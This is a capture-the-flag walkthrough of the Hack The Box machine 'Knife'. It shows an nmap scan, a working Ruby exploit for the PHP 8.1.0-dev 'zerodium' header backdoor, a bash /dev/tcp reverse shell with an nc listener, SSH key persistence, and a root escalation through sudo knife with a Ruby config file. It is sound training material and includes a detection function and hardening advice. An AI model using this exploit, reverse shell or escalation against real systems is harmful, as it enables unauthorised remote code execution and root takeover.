Knife Walkthrough – Hackthebox – Writeup

Knife is an active machine on Hack The Box, so only read on if you are really stuck.

Note: Writing public writeups for active machines is against HTB's rules; otherwise I could have protected this post with the root flag. Also, I couldn't find a content locker for WordPress that allows a custom message, so I couldn't password-protect this post using other methods like the root hash or the contents of a root-only readable file.

Walkthrough of Knife

To keep normal internet access while connected to the lab, remove the default route that the VPN adds over tun0.

sudo route del -net default gw netmask dev tun0

Scan open ports

Firstly, I scanned the exposed services by identifying the open ports on the target machine.

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log

For some reason my script execution failed. Anyway, I went on to look at the web server.

Enumerate web server

When I opened the browser's developer tools, I found out that the web server was using PHP 8.1.0-dev.

This exact version is the one that was distributed from PHP's compromised git server in March 2021: it contains a backdoor that executes PHP code supplied in a request header, so there was a very recent public RCE exploit for it.

I downloaded the code from the link above and saved it as

wget -O

Next, I ran some commands to verify the exploit.

python3 -u -c "id"

Now, my next step was to spawn a reverse shell, so I started a listener on port 4444.

nc -nlvp 4444 
python3 -u -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/ 0>&1'"

Finally, I got the reverse shell.
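The exploit script above is not reproduced on this page, so here is an added example (my own code, not the downloaded exploit) of what it has to do. The 8.1.0-dev backdoor reads a request header named User-Agentt (note the double t); if the value starts with "zerodium", the remainder is passed to zend_eval_string() and runs as PHP. The block builds that request, can send it, and on the defender side flags raw requests that carry the trigger header. The target URL is an assumption; the real IP from the writeup is not reproduced.

```ruby
require 'net/http'
require 'uri'

# The PHP 8.1.0-dev backdoor looked at a request header named "User-Agentt".
# If its value started with "zerodium", everything after that prefix was handed
# to zend_eval_string(), i.e. executed as PHP code inside the web server.
BACKDOOR_HEADER = 'User-Agentt'
BACKDOOR_MAGIC  = 'zerodium'

# Render cmd as a PHP single-quoted string literal (escape backslash and quote).
def php_quote(str)
  "'" + str.gsub(/['\\]/) { |c| "\\#{c}" } + "'"
end

# Build, without sending, the GET request that makes the backdoor run `cmd`.
# system() echoes the command's output straight into the response body.
def backdoor_request(url, cmd)
  uri = URI(url)
  req = Net::HTTP::Get.new(uri)
  req[BACKDOOR_HEADER] = "#{BACKDOOR_MAGIC}system(#{php_quote(cmd)});"
  req
end

# Attacker side: send the request and return the command output.
# Example (assumed host): run_via_backdoor('http://target.example/', 'id')
def run_via_backdoor(url, cmd)
  uri = URI(url)
  Net::HTTP.start(uri.host, uri.port) do |http|
    http.request(backdoor_request(url, cmd)).body
  end
end

# Defender side: does a raw HTTP request carry the trigger header?
# A normal client never sends "User-Agentt", so the header name alone is the
# signal; the "zerodium" prefix is only required to confirm it is the exploit.
def backdoor_attempt?(raw_request)
  raw_request.each_line.any? do |line|
    name, sep, value = line.partition(':')
    next false if sep.empty?
    name.strip.casecmp?(BACKDOOR_HEADER) && value.strip.start_with?(BACKDOOR_MAGIC)
  end
end
```

The defender function is the useful half for anyone who still has access logs from that period: most web servers do not log custom headers, so the check is meant for a reverse proxy, WAF or packet capture, where the raw header line is available.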

Likewise, I got the user flag. I copied my public key to the machine to get SSH access; somehow, the target's own private key didn't work for me.

# on the target, as james
echo __public_key__ > ~/.ssh/authorized_keys
# on local machine
ssh james@ -i ~/.ssh/id_rsa

And, I finally got the SSH shell.

Root privilege escalation

Next, I looked at the sudo permissions of the user.

sudo -l

The user could run the knife binary as root without supplying his own password (NOPASSWD). So I ran the binary to see what it did.

sudo knife

The binary reads a configuration file. Going through the extensive guides online, I found out that this config file is Ruby source: knife evaluates it, so any Ruby placed in it is executed with knife's privileges.

Hence, I decided to get a root shell. I created a file called "config.rb" and added the following code.

vi config.rb

Then, I executed the knife command with the config file.

sudo knife user list -c config.rb
cat root.txt
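The config.rb contents are not shown above, so the following added example (my own illustration, not Chef's or knife's code) shows why the trick works. Chef loads its config by reading the file and instance_eval-ing it; the KnifeConfigLike class below is a stand-in for that behaviour, and MALICIOUS_CONFIG is a constructed config.rb whose last line is ordinary Ruby rather than a setting. Loading it runs that line, which is exactly what happens under sudo knife with a line such as exec '/bin/bash'.

```ruby
require 'tempfile'

# Stand-in for what knife does with its config file: Chef's Config.from_file
# reads the file and instance_evals it (this class is an illustration, not
# Chef's code). Every line of config.rb is Ruby run with knife's privileges.
class KnifeConfigLike
  attr_reader :settings

  def initialize
    @settings = {}
  end

  # Ordinary settings such as `node_name 'james'` arrive as method calls.
  def method_missing(name, *args)
    @settings[name] = args.first
  end

  def from_file(path)
    instance_eval(IO.read(path), path, 1)
    self
  end
end

# Constructed config.rb: two legitimate-looking settings, then arbitrary Ruby.
# The heredoc is single-quoted so "#{...}" is interpolated when the config is
# loaded, not when this script defines the string. Under
# `sudo knife user list -c config.rb` the last line could be `exec '/bin/bash'`,
# which is what turns the NOPASSWD sudo rule into a root shell.
MALICIOUS_CONFIG = <<~'RUBY'
  node_name  'james'
  client_key '/home/james/.chef/james.pem'
  File.write(ENV.fetch('KNIFE_DEMO_MARKER'), "config.rb ran as euid=#{Process.euid}")
RUBY

# Load the config through the stand-in. Returns [node_name setting, text that
# the payload line wrote], proving the "config" was executed, not just parsed.
def demo_knife_config_is_code
  marker = Tempfile.new('knife-marker')
  marker.close
  ENV['KNIFE_DEMO_MARKER'] = marker.path
  Tempfile.create(['config', '.rb']) do |f|
    f.write(MALICIOUS_CONFIG)
    f.flush
    cfg = KnifeConfigLike.new.from_file(f.path)
    [cfg.settings[:node_name], File.read(marker.path)]
  end
ensure
  marker&.unlink
end
```

The subcommand passed to knife does not matter: the config file is loaded before user list (or anything else) runs, so the payload fires even if the subcommand itself fails afterwards. The fix on the defending side is the usual one for sudo rules: never grant NOPASSWD on a tool whose configuration is executable code.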


This machine involves no credentials and no brute forcing; it rewards close inspection of everything you see.
